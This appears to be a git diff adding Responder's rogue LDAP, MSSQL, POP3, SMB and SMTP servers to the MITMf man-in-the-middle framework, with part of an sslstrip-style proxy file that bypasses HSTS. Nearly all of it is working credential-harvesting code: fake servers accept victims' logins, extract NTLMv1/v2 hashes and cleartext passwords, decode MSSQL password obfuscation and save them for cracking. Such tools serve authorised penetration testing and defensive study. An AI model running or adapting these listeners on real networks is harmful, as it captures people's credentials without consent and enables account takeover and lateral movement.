return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
if Search3:
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
SSPIStart = data[42:]
LMhashLen = struct.unpack('<H',data[54:56])[0]
if LMhashLen > 10:
LMhashOffset = struct.unpack('<H',data[58:60])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[64:66])[0]
NthashOffset = struct.unpack('<H',data[66:68])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[72:74])[0]
DomainOffset = struct.unpack('<H',data[74:76])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[80:82])[0]
UserOffset = struct.unpack('<H',data[82:84])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+settings.Config.NumChal
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': NtHash,
'fullhash': WriteHash,
})
if LMhashLen < 2 and settings.Config.Verbose:
settings.Config.ResponderLogger.info("[LDAP] Ignoring anonymous NTLM authentication")
def ParseNTLM(data,client):
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
Search2 = re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data)
if Search1:
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
NTLMChall.calculate()
return str(NTLMChall)
if Search2:
ParseLDAPHash(data,client)
def ParseLDAPPacket(data, client):
if data[1:2] == '\x84':
PacketLen = struct.unpack('>i',data[2:6])[0]
MessageSequence = struct.unpack('<b',data[8:9])[0]
Operation = data[9:10]
sasl = data[20:21]
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
LDAPVersion = struct.unpack('<b',data[17:18])[0]
if Operation == "\x60":
UserDomainLen = struct.unpack('<b',data[19:20])[0]
UserDomain = data[20:20+UserDomainLen]
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
if AuthHeaderType == "\x80":
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserDomain,
'cleartext': Password,
'fullhash': UserDomain+':'+Password,
})
if sasl == "\xA3":
Buffer = ParseNTLM(data,client)
return Buffer
elif Operation == "\x63":
Buffer = ParseSearch(data)
return Buffer
else:
if settings.Config.Verbose:
settings.Config.ResponderLogger.info('[LDAP] Operation not supported')
# LDAP Server class
class LDAPServer(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(0.5)
data = self.request.recv(8092)
Buffer = ParseLDAPPacket(data,self.client_address[0])
if Buffer:
self.request.send(Buffer)
except socket.timeout:
pass

186
core/servers/MSSQL.py Normal file
View file

@ -0,0 +1,186 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from core.responder.utils import *
class MSSQL:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 1433), MSSQLServer)
else:
server = ThreadingTCPServer(('', 1433), MSSQLServer)
t = threading.Thread(name='MSSQL', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MSSQL server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class TDS_Login_Packet():
def __init__(self, data):
ClientNameOff = struct.unpack('<h', data[44:46])[0]
ClientNameLen = struct.unpack('<h', data[46:48])[0]
UserNameOff = struct.unpack('<h', data[48:50])[0]
UserNameLen = struct.unpack('<h', data[50:52])[0]
PasswordOff = struct.unpack('<h', data[52:54])[0]
PasswordLen = struct.unpack('<h', data[54:56])[0]
AppNameOff = struct.unpack('<h', data[56:58])[0]
AppNameLen = struct.unpack('<h', data[58:60])[0]
ServerNameOff = struct.unpack('<h', data[60:62])[0]
ServerNameLen = struct.unpack('<h', data[62:64])[0]
Unknown1Off = struct.unpack('<h', data[64:66])[0]
Unknown1Len = struct.unpack('<h', data[66:68])[0]
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
LocaleOff = struct.unpack('<h', data[72:74])[0]
LocaleLen = struct.unpack('<h', data[74:76])[0]
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
def ParseSQLHash(data, client):
SSPIStart = data[8:]
LMhashLen = struct.unpack('<H',data[20:22])[0]
LMhashOffset = struct.unpack('<H',data[24:26])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[30:32])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[36:38])[0]
DomainOffset = struct.unpack('<H',data[40:42])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[44:46])[0]
UserOffset = struct.unpack('<H',data[48:50])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
Pw = []
for x in Pwd:
Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
return ''.join(Pw)
def ParseClearTextSQLPass(data, client):
TDS = TDS_Login_Packet(data)
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
'client': client,
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
'user': TDS.UserName,
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
})
# MSSQL Server class
class MSSQLServer(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
settings.Config.ResponderLogger.info("[MSSQL] Received connection from %s" % self.client_address[0])
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(0.1)
# Pre-Login Message
if data[0] == "\x12":
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
# NegoSSP
if data[0] == "\x10":
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
# NegoSSP Auth
if data[0] == "\x11":
ParseSQLHash(data,self.client_address[0])
except socket.timeout:
pass
self.request.close()

90
core/servers/POP3.py Normal file
View file

@ -0,0 +1,90 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import POPOKPacket
class POP3:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 110), POP3Server)
else:
server = ThreadingTCPServer(('', 110), POP3Server)
t = threading.Thread(name='POP3', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting POP3 server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# POP3 Server class
class POP3Server(BaseRequestHandler):
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
data = self.request.recv(1024)
return data
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
data = self.SendPacketAndRead()
else:
data = self.SendPacketAndRead()
except Exception:
pass

433
core/servers/SMB.py Normal file
View file

@ -0,0 +1,433 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import threading
import socket
from random import randrange
from core.responder.packets import SMBHeader, SMBNegoAnsLM, SMBNegoAns, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.utils import *
class SMB:
def start(self):
try:
#if OsInterfaceIsSupported():
# server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
# server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
#else:
server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Detect if SMB auth was Anonymous
def Is_Anonymous(data):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
if SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
packet = data
try:
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
if Dialect[0] == "NT LM 0.12":
return "\x00\x00"
if Dialect[1] == "NT LM 0.12":
return "\x01\x00"
if Dialect[2] == "NT LM 0.12":
return "\x02\x00"
if Dialect[3] == "NT LM 0.12":
return "\x03\x00"
if Dialect[4] == "NT LM 0.12":
return "\x04\x00"
if Dialect[5] == "NT LM 0.12":
return "\x05\x00"
if Dialect[6] == "NT LM 0.12":
return "\x06\x00"
if Dialect[7] == "NT LM 0.12":
return "\x07\x00"
if Dialect[8] == "NT LM 0.12":
return "\x08\x00"
if Dialect[9] == "NT LM 0.12":
return "\x09\x00"
if Dialect[10] == "NT LM 0.12":
return "\x0a\x00"
if Dialect[11] == "NT LM 0.12":
return "\x0b\x00"
if Dialect[12] == "NT LM 0.12":
return "\x0c\x00"
if Dialect[13] == "NT LM 0.12":
return "\x0d\x00"
if Dialect[14] == "NT LM 0.12":
return "\x0e\x00"
if Dialect[15] == "NT LM 0.12":
return "\x0f\x00"
except Exception:
print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
print hexdump(packet)
#Set MID SMB Header field.
def midcalc(data):
pack=data[34:36]
return pack
#Set UID SMB Header field.
def uidcalc(data):
pack=data[32:34]
return pack
#Set PID SMB Header field.
def pidcalc(data):
pack=data[30:32]
return pack
#Set TID SMB Header field.
def tidcalc(data):
pack=data[28:30]
return pack
def ParseShare(data):
packet = data[:]
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
settings.Config.ResponderLogger.info("[SMB] Requested Share : %s" % a.group(0).replace('\x00', ''))
#Parse SMB NTLMSSP v1/v2
def ParseSMBHash(data,client):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
BccLen = struct.unpack('<H',data[61:63])[0]
if SecBlobLen < 260:
SSPIStart = data[75:]
LMhashLen = struct.unpack('<H',data[89:91])[0]
LMhashOffset = struct.unpack('<H',data[91:93])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[97:99])[0]
NthashOffset = struct.unpack('<H',data[99:101])[0]
else:
SSPIStart = data[79:]
LMhashLen = struct.unpack('<H',data[93:95])[0]
LMhashOffset = struct.unpack('<H',data[95:97])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[101:103])[0]
NthashOffset = struct.unpack('<H',data[103:105])[0]
if NthashLen == 24:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[105:107])[0]
DomainOffset = struct.unpack('<H',data[107:109])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[113:115])[0]
UserOffset = struct.unpack('<H',data[115:117])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[109:111])[0]
DomainOffset = struct.unpack('<H',data[111:113])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[117:119])[0]
UserOffset = struct.unpack('<H',data[119:121])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
# Parse SMB NTLMv1/v2
def ParseLMNTHash(data, client):
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
settings.Config.ResponderLogger.info("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
# SMB Server class, NTLMSSP
class SMB1(BaseRequestHandler):
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if len(data) < 1:
break
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
# Negociate Protocol Response
if data[8:10] == "\x72\x00":
# \x72 == Negociate Protocol Response
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Session Setup AndX Request
if data[8:10] == "\x73\x00":
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(4096)
# STATUS_SUCCESS
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0])
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Tree Connect AndX Request
if data[8:10] == "\x75\x00":
ParseShare(data)
# Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Tree Disconnect.
if data[8:10] == "\x71\x00":
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##NT_CREATE Access Denied.
if data[8:10] == "\xa2\x00":
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Trans2 Access Denied.
if data[8:10] == "\x25\x00":
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##LogOff.
if data[8:10] == "\x74\x00":
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.timeout:
pass
# SMB Server class, old version
class SMB1LM(BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0])
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass

98
core/servers/SMTP.py Normal file
View file

@ -0,0 +1,98 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from core.responder.utils import *
from base64 import b64decode, b64encode
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
class SMTP:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 25), ESMTP)
server2 = ThreadingTCPServer((settings.Config.Bind_To, 587), ESMTP)
else:
server1 = ThreadingTCPServer(('', 25), SMB1)
server2 = ThreadingTCPServer(('', 587), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMTP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# ESMTP Server class
class ESMTP(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == "EHLO":
self.request.send(str(SMTPAUTH()))
data = self.request.recv(1024)
if data[0:4] == "AUTH":
self.request.send(str(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = filter(None, b64decode(data).split('\x00'))
Username = User[0]
Password = User[1]
except:
Username = b64decode(data)
self.request.send(str(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
pass

0
core/servers/__init__.py Normal file
View file

View file

@ -16,7 +16,13 @@
# USA
#
import urlparse, logging, os, sys, random, re, dns.resolver
import urlparse
import logging
import os
import sys
import random
import re
import dns.resolver
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
@ -33,9 +39,10 @@ from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.logger import logger
mitmf_logger = logging.getLogger('mitmf')
formatter = logging.Formatter("%(asctime)s [ClientRequest] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ClientRequest", formatter)
class ClientRequest(Request):
@ -49,52 +56,45 @@ class ClientRequest(Request):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.hsts = URLMonitor.getInstance().hsts
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
#self.uniqueId = random.randint(0, 10000)
#Use are own DNS server instead of reactor.resolve()
self.resolver = URLMonitor.getInstance().getResolver()
self.customResolver = dns.resolver.Resolver()
self.customResolver.nameservers = ['127.0.0.1']
self.customResolver.port = URLMonitor.getInstance().getResolverPort()
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
#for k,v in headers.iteritems():
# mitmf_logger.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v))
if self.hsts:
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
